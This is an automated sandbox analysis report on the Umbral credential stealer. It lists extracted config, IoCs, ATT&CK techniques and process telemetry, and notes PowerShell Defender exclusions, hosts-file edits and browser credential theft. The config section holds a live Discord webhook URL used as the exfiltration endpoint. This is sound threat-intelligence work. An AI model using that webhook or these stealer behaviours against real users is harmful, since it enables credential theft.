umbral | hxxps://github[.]com/Blank-c/Umbral-Stealer/releases/tag/v1[.]3

Analysis

max time kernel
981s
max time network
978s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2024 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Blank-c/Umbral-Stealer/releases/tag/v1.3

Score

10^/10

umbral agilenet credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1281384335987052585/IuQu07DbGJnPBF_E-75m0noN8q_lFZe0yKFbFgwf3x9ruXdJ8swEIMTZ-uqiW0gclJt4

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e000000023706-1758.dat	family_umbral
behavioral1/memory/1648-1760-0x000001780FDD0000-0x000001780FE10000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5632	powershell.exe
4176	powershell.exe
3452	powershell.exe
4220	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Executes dropped EXE 1 IoCs

pid	Process
1648	Umbral.exe

Obfuscated with Agile.Net obfuscator 8 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/5996-215-0x00000238DBF30000-0x00000238DBF50000-memory.dmp	agile_net
behavioral1/memory/5996-216-0x00000238DBF50000-0x00000238DBF70000-memory.dmp	agile_net
behavioral1/memory/5996-217-0x00000238DC280000-0x00000238DC2EE000-memory.dmp	agile_net
behavioral1/memory/5996-218-0x00000238DBF70000-0x00000238DBF7E000-memory.dmp	agile_net
behavioral1/memory/5996-219-0x00000238DC2F0000-0x00000238DC34A000-memory.dmp	agile_net
behavioral1/memory/5996-220-0x00000238DBF80000-0x00000238DBF90000-memory.dmp	agile_net
behavioral1/memory/5996-221-0x00000238DBFB0000-0x00000238DBFCE000-memory.dmp	agile_net
behavioral1/memory/5996-222-0x00000238DC4A0000-0x00000238DC5EA000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
98	discord.com
155	discord.com
211	discord.com
212	discord.com
223	discord.com
229	camo.githubusercontent.com
96	discord.com
97	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
220	ip-api.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3580	cmd.exe
3336	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1932	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	Umbral.builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Pictures"	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Umbral.builder.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Umbral.builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "3"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Umbral.builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Umbral.builder.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings	mspaint.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Umbral.builder.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-786284298-625481688-3210388970-1000\{1F54A503-2BE3-47BE-BA32-4D53A01C5788}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	Umbral.builder.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Umbral.builder.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Umbral.builder.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	Umbral.builder.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
3460	NOTEPAD.EXE
5364	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3336	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1692	msedge.exe
1692	msedge.exe
5788	msedge.exe
5788	msedge.exe
3852	identity_helper.exe
3852	identity_helper.exe
3064	msedge.exe
3064	msedge.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5996	Umbral.builder.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 24 IoCs

pid	Process
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5996	Umbral.builder.exe
Token: 33	1380	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1380	AUDIODG.EXE
Token: SeDebugPrivilege	1648	Umbral.exe
Token: SeDebugPrivilege	5632	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	2948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4872	wmic.exe
Token: SeSecurityPrivilege	4872	wmic.exe
Token: SeTakeOwnershipPrivilege	4872	wmic.exe
Token: SeLoadDriverPrivilege	4872	wmic.exe
Token: SeSystemProfilePrivilege	4872	wmic.exe
Token: SeSystemtimePrivilege	4872	wmic.exe
Token: SeProfSingleProcessPrivilege	4872	wmic.exe
Token: SeIncBasePriorityPrivilege	4872	wmic.exe
Token: SeCreatePagefilePrivilege	4872	wmic.exe
Token: SeBackupPrivilege	4872	wmic.exe
Token: SeRestorePrivilege	4872	wmic.exe
Token: SeShutdownPrivilege	4872	wmic.exe
Token: SeDebugPrivilege	4872	wmic.exe
Token: SeSystemEnvironmentPrivilege	4872	wmic.exe
Token: SeRemoteShutdownPrivilege	4872	wmic.exe
Token: SeUndockPrivilege	4872	wmic.exe
Token: SeManageVolumePrivilege	4872	wmic.exe
Token: 33	4872	wmic.exe
Token: 34	4872	wmic.exe
Token: 35	4872	wmic.exe
Token: 36	4872	wmic.exe
Token: SeIncreaseQuotaPrivilege	4872	wmic.exe
Token: SeSecurityPrivilege	4872	wmic.exe
Token: SeTakeOwnershipPrivilege	4872	wmic.exe
Token: SeLoadDriverPrivilege	4872	wmic.exe
Token: SeSystemProfilePrivilege	4872	wmic.exe
Token: SeSystemtimePrivilege	4872	wmic.exe
Token: SeProfSingleProcessPrivilege	4872	wmic.exe
Token: SeIncBasePriorityPrivilege	4872	wmic.exe
Token: SeCreatePagefilePrivilege	4872	wmic.exe
Token: SeBackupPrivilege	4872	wmic.exe
Token: SeRestorePrivilege	4872	wmic.exe
Token: SeShutdownPrivilege	4872	wmic.exe
Token: SeDebugPrivilege	4872	wmic.exe
Token: SeSystemEnvironmentPrivilege	4872	wmic.exe
Token: SeRemoteShutdownPrivilege	4872	wmic.exe
Token: SeUndockPrivilege	4872	wmic.exe
Token: SeManageVolumePrivilege	4872	wmic.exe
Token: 33	4872	wmic.exe
Token: 34	4872	wmic.exe
Token: 35	4872	wmic.exe
Token: 36	4872	wmic.exe
Token: SeIncreaseQuotaPrivilege	1020	wmic.exe
Token: SeSecurityPrivilege	1020	wmic.exe
Token: SeTakeOwnershipPrivilege	1020	wmic.exe
Token: SeLoadDriverPrivilege	1020	wmic.exe
Token: SeSystemProfilePrivilege	1020	wmic.exe
Token: SeSystemtimePrivilege	1020	wmic.exe
Token: SeProfSingleProcessPrivilege	1020	wmic.exe
Token: SeIncBasePriorityPrivilege	1020	wmic.exe
Token: SeCreatePagefilePrivilege	1020	wmic.exe
Token: SeBackupPrivilege	1020	wmic.exe
Token: SeRestorePrivilege	1020	wmic.exe
Token: SeShutdownPrivilege	1020	wmic.exe
Token: SeDebugPrivilege	1020	wmic.exe
Token: SeSystemEnvironmentPrivilege	1020	wmic.exe

Suspicious use of FindShellTrayWindow 56 IoCs

pid	Process
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe
5788	msedge.exe

Suspicious use of SetWindowsHookEx 42 IoCs

pid	Process
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
4444	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
2228	OpenWith.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
3224	mspaint.exe
4156	OpenWith.exe
5996	Umbral.builder.exe
5996	Umbral.builder.exe
5788	msedge.exe
5788	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5788 wrote to memory of 3384	5788	msedge.exe	85
PID 5788 wrote to memory of 3384	5788	msedge.exe	85
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
